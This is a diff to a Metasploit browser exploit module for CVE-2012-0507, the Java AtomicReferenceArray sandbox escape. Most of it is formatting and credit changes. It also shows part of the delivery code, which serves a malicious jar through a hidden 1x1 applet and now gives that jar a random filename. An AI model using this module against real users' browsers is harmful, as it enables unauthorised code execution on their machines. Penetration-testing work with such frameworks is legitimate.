Modify CVE-2012-0507

modules/exploits/multi/browser/java_atomicreferencearray.rb

@@ -15,21 +15,21 @@ class Metasploit3 < Msf::Exploit::Remote
 	include Msf::Exploit::EXE
 
 	def initialize( info = {} )
-
 		super( update_info( info,
-			'Name'          => 'Java AtomicReferenceArray Type Violation Vulnerability',
-			'Description'   => %q{
+			'Name'           => 'Java AtomicReferenceArray Type Violation Vulnerability',
+			'Description'    => %q{
 					This module exploits a vulnerability due to the fact that
 				AtomicReferenceArray uses the Unsafe class to store a reference in an
 				array directly, which may violate type safety if not used properly.
 				This allows a way to escape the JRE sandbox, and load additional classes
 				in order to perform malicious operations.
 			},
-			'License'       => MSF_LICENSE,
-			'Author'        =>
+			'License'        => MSF_LICENSE,
+			'Author'         =>
 				[
-					'sinn3r', # metasploit module
-					'juan vazquez' # metasploit module
+					'sinn3r',       # metasploit module
+					'juan vazquez', # metasploit module
+					'egypt'         # special assistance
 				],
 			'References'     =>
 				[
@@ -39,9 +39,9 @@ class Metasploit3 < Msf::Exploit::Remote
 					['URL', 'http://blogs.technet.com/b/mmpc/archive/2012/03/20/an-interesting-case-of-jre-sandbox-breach-cve-2012-0507.aspx'],
 					['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2012-0507']
 				],
-			'Platform'      => [ 'java', 'win', 'osx', 'linux', 'solaris' ],
-			'Payload'       => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
-			'Targets'       =>
+			'Platform'       => [ 'java', 'win', 'osx', 'linux', 'solaris' ],
+			'Payload'        => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
+			'Targets'        =>
 				[
 					[ 'Generic (Java Payload)',
 						{
@@ -92,9 +92,9 @@ class Metasploit3 < Msf::Exploit::Remote
 
 
 	def on_request_uri( cli, request )
-		data = nil
-		host = nil
-		port = nil
+		data = ""
+		host = ""
+		port = ""
 		peer = "#{cli.peerhost}:#{cli.peerport}"
 
 		if not request.uri.match(/\.jar$/i)
@@ -148,16 +148,18 @@ class Metasploit3 < Msf::Exploit::Remote
 			return
 		end
 
-		print_status( "#{peer} - sending jar to ..." )
+		print_status( "#{peer} - sending jar..." )
 		send_response( cli, generate_jar(), { 'Content-Type' => "application/octet-stream" } )
 
 		handler( cli )
 	end
 
 	def generate_html( data, jar, host, port )
+		jar_name = rand_text_alpha(rand(6)+3) + ".jar"
+
 		html  = "<html><head></head>"
 		html += "<body>"
-		html += "<applet archive=\"Applet.jar\" code=\"a.Exploit.class\" width=\"1\" height=\"1\">"
+		html += "<applet archive=\"#{jar_name}\" code=\"msf.x.Exploit.class\" width=\"1\" height=\"1\">"
 		html += "<param name=\"data\" value=\"#{data}\"/>" if data
 		html += "<param name=\"jar\" value=\"#{jar}\"/>" if jar
 		html += "<param name=\"lhost\" value=\"#{host}\"/>" if host